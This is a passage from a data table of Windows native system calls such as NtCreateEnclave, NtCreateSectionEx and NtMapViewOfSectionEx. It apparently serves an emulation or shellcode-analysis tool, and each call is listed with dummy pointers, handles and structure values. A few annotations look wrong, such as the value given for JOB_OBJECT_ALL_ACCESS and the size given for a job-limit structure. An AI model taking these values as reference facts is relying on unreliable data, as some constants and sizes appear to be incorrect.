\"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenJobObject\": {\r\n \"ntFunc\": \"NtOpenJobObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct74\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00020000\",\r\n \"additionalComment\": \"ACCESS_MASK DesiredAccess (JOB_OBJECT_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to HANDLE JobHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct74\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (no name)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtQueryInformationJobObject\": {\r\n \"ntFunc\": \"NtQueryInformationJobObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG ReturnLength (dummy pointer, optional, may be None)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000040\"\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"ULONG JobInformationLength (typical size for JOBOBJECT_BASIC_ACCOUNTING_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to JobInformation buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"JOBOBJECTINFOCLASS JobInformationClass (JobObjectBasicAccountingInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE JobHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtSetInformationJobObject\": {\r\n \"ntFunc\": \"NtSetInformationJobObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"ULONG JobInformationLength (typical size for JOBOBJECT_BASIC_LIMIT_INFORMATION)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to JobInformation buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"JOBOBJECTINFOCLASS JobInformationClass (JobObjectBasicLimitInformation)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE JobHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtTerminateJobObject\": {\r\n \"ntFunc\": \"NtTerminateJobObject\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xC0000001\",\r\n \"additionalComment\": \"NTSTATUS ExitStatus (STATUS_UNSUCCESSFUL)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE JobHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCallEnclave\": {\r\n \"ntFunc\": \"NtCallEnclave\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Optional PVOID (None, not used in this example)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN WaitForThread (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"PVOID Parameter (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xDEADBEEF\"\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"PENCLAVE_ROUTINE Routine (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00401000\"\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtTerminateEnclave\": {\r\n \"ntFunc\": \"NtTerminateEnclave\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"BOOLEAN WaitForThread (TRUE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"PVOID BaseAddress (typical enclave base address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtInitializeEnclave\": {\r\n \"ntFunc\": \"NtInitializeEnclave\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to ULONG Result (dummy pointer, optional out parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"EnclaveInformationLength (32 bytes, typical for SGX)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to EnclaveInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadcafe0\"\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"BaseAddress (typical enclave base address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateEnclave\": {\r\n \"ntFunc\": \"NtCreateEnclave\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to ULONG Result (dummy pointer, optional out parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000020\",\r\n \"additionalComment\": \"EnclaveInformationLength (32 bytes, typical for SGX)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to EnclaveInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadcafe0\"\r\n },\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"EnclaveType (ENCLAVE_TYPE_SGX)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"InitialCommitment (4 KB, typical page size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00100000\",\r\n \"additionalComment\": \"Size (1 MB enclave)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"ZeroBits (no address restriction)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0040\",\r\n \"additionalComment\": \"Pointer to PVOID BaseAddress (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00400000\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtLoadEnclaveData\": {\r\n \"ntFunc\": \"NtLoadEnclaveData\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0050\",\r\n \"additionalComment\": \"Pointer to ULONG Result (dummy pointer, optional out parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0xbadd0060\",\r\n \"additionalComment\": \"Pointer to SIZE_T BytesWritten (dummy pointer, optional out parameter)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00001000\"\r\n },\r\n {\r\n \"value\": \"0x00000010\",\r\n \"additionalComment\": \"PageInformationLength (16 bytes, typical for SGX)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0070\",\r\n \"additionalComment\": \"Pointer to PageInformation (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadcafe0\"\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"Protect (PAGE_EXECUTE_READWRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"BufferSize (4 KB, typical page size)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0080\",\r\n \"additionalComment\": \"Pointer to Buffer (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0xbadcafe0\"\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"BaseAddress (typical enclave base address)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreateSectionEx\": {\r\n \"ntFunc\": \"NtCreateSectionEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ExtendedParameterCount (2 parameters)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0090\",\r\n \"additionalComment\": \"Pointer to MEM_EXTENDED_PARAMETER array (dummy pointer)\",\r\n \"structurePointer\": \"MEM_EXTENDED_PARAMETER\",\r\n \"structureRef\": \"struct75\",\r\n \"structureValueExpectations\": \"Array of MEM_EXTENDED_PARAMETER structures.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"FileHandle (None, pagefile-backed section)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x08000000\",\r\n \"additionalComment\": \"AllocationAttributes (SEC_COMMIT)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000004\",\r\n \"additionalComment\": \"SectionPageProtection (PAGE_READWRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00a0\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER MaximumSize (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct76\",\r\n \"structureValueExpectations\": \"Maximum size of the section in bytes.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00b0\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct77\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F000F\",\r\n \"additionalComment\": \"DesiredAccess (SECTION_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00c0\",\r\n \"additionalComment\": \"Pointer to HANDLE SectionHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct75\": {\r\n \"type\": \"MEM_EXTENDED_PARAMETER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"MEM_EXTENDED_PARAMETER_TYPE\"\r\n },\r\n {\r\n \"fieldName\": \"Reserved\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Reserved, must be zero\"\r\n },\r\n {\r\n \"fieldName\": \"Value\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000001\",\r\n \"fieldComment\": \"Sample value\"\r\n }\r\n ]\r\n },\r\n \"struct76\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x000200000\",\r\n \"fieldComment\": \"2 MB section size\"\r\n }\r\n ]\r\n },\r\n \"struct77\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (unnamed section)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtMapViewOfSectionEx\": {\r\n \"ntFunc\": \"NtMapViewOfSectionEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000002\",\r\n \"additionalComment\": \"ExtendedParameterCount (2 parameters)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00d0\",\r\n \"additionalComment\": \"Pointer to MEM_EXTENDED_PARAMETER array (dummy pointer)\",\r\n \"structurePointer\": \"MEM_EXTENDED_PARAMETER\",\r\n \"structureRef\": \"struct78\",\r\n \"structureValueExpectations\": \"Array of MEM_EXTENDED_PARAMETER structures.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000040\",\r\n \"additionalComment\": \"Win32Protect (PAGE_EXECUTE_READWRITE)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00001000\",\r\n \"additionalComment\": \"AllocationType (MEM_COMMIT)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd00e0\",\r\n \"additionalComment\": \"Pointer to SIZE_T ViewSize (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00100000\"\r\n },\r\n {\r\n \"value\": \"0xbadd00f0\",\r\n \"additionalComment\": \"Pointer to LARGE_INTEGER SectionOffset (dummy pointer)\",\r\n \"structurePointer\": \"LARGE_INTEGER\",\r\n \"structureRef\": \"struct79\",\r\n \"structureValueExpectations\": \"Offset into the section.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0100\",\r\n \"additionalComment\": \"Pointer to PVOID BaseAddress (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00400000\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000888\",\r\n \"additionalComment\": \"HANDLE SectionHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct78\": {\r\n \"type\": \"MEM_EXTENDED_PARAMETER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Type\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"MEM_EXTENDED_PARAMETER_TYPE\"\r\n },\r\n {\r\n \"fieldName\": \"Reserved\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Reserved, must be zero\"\r\n },\r\n {\r\n \"fieldName\": \"Value\",\r\n \"fieldType\": \"ULONG_PTR\",\r\n \"fieldValue\": \"0x00000002\",\r\n \"fieldComment\": \"Sample value\"\r\n }\r\n ]\r\n },\r\n \"struct79\": {\r\n \"type\": \"LARGE_INTEGER\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"QuadPart\",\r\n \"fieldType\": \"LONGLONG\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"Offset 0\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtUnmapViewOfSectionEx\": {\r\n \"ntFunc\": \"NtUnmapViewOfSectionEx\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000000\",\r\n \"additionalComment\": \"Flags (default: 0)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00400000\",\r\n \"additionalComment\": \"BaseAddress (commonly the base of a mapped section)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ProcessHandle (dummy handle)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {}\r\n },\r\n \"NtCreatePartition\": {\r\n \"ntFunc\": \"NtCreatePartition\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0x00000001\",\r\n \"additionalComment\": \"PreferredNode (example: NUMA node 1)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0000\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, typically None for unnamed partition)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct80\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x001F0001\",\r\n \"additionalComment\": \"DesiredAccess (example: PARTITION_ALL_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0010\",\r\n \"additionalComment\": \"Pointer to HANDLE PartitionHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n },\r\n {\r\n \"value\": \"0x00000444\",\r\n \"additionalComment\": \"HANDLE ParentPartitionHandle (dummy handle, often None for root)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct80\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": \"Size of OBJECT_ATTRIBUTES\"\r\n },\r\n {\r\n \"fieldName\": \"RootDirectory\",\r\n \"fieldType\": \"HANDLE\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"ObjectName\",\r\n \"fieldType\": \"PUNICODE_STRING\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None (unnamed partition)\"\r\n },\r\n {\r\n \"fieldName\": \"Attributes\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000040\",\r\n \"fieldComment\": \"OBJ_CASE_INSENSITIVE\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityDescriptor\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n },\r\n {\r\n \"fieldName\": \"SecurityQualityOfService\",\r\n \"fieldType\": \"PVOID\",\r\n \"fieldValue\": \"0x00000000\",\r\n \"fieldComment\": \"None\"\r\n }\r\n ]\r\n }\r\n }\r\n },\r\n \"NtOpenPartition\": {\r\n \"ntFunc\": \"NtOpenPartition\",\r\n \"pushes\": [\r\n {\r\n \"value\": \"0xbadd0020\",\r\n \"additionalComment\": \"Pointer to OBJECT_ATTRIBUTES (dummy pointer, typically points to named partition)\",\r\n \"structurePointer\": \"OBJECT_ATTRIBUTES\",\r\n \"structureRef\": \"struct81\",\r\n \"structureValueExpectations\": \"Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.\",\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0x00120001\",\r\n \"additionalComment\": \"DesiredAccess (example: PARTITION_QUERY_ACCESS)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": None\r\n },\r\n {\r\n \"value\": \"0xbadd0030\",\r\n \"additionalComment\": \"Pointer to HANDLE PartitionHandle (dummy pointer)\",\r\n \"structurePointer\": None,\r\n \"structureRef\": None,\r\n \"structureValueExpectations\": None,\r\n \"pointedValue\": \"0x00000000\"\r\n }\r\n ],\r\n \"structures\": {\r\n \"struct81\": {\r\n \"type\": \"OBJECT_ATTRIBUTES\",\r\n \"fields\": [\r\n {\r\n \"fieldName\": \"Length\",\r\n \"fieldType\": \"ULONG\",\r\n \"fieldValue\": \"0x00000030\",\r\n \"fieldComment\": 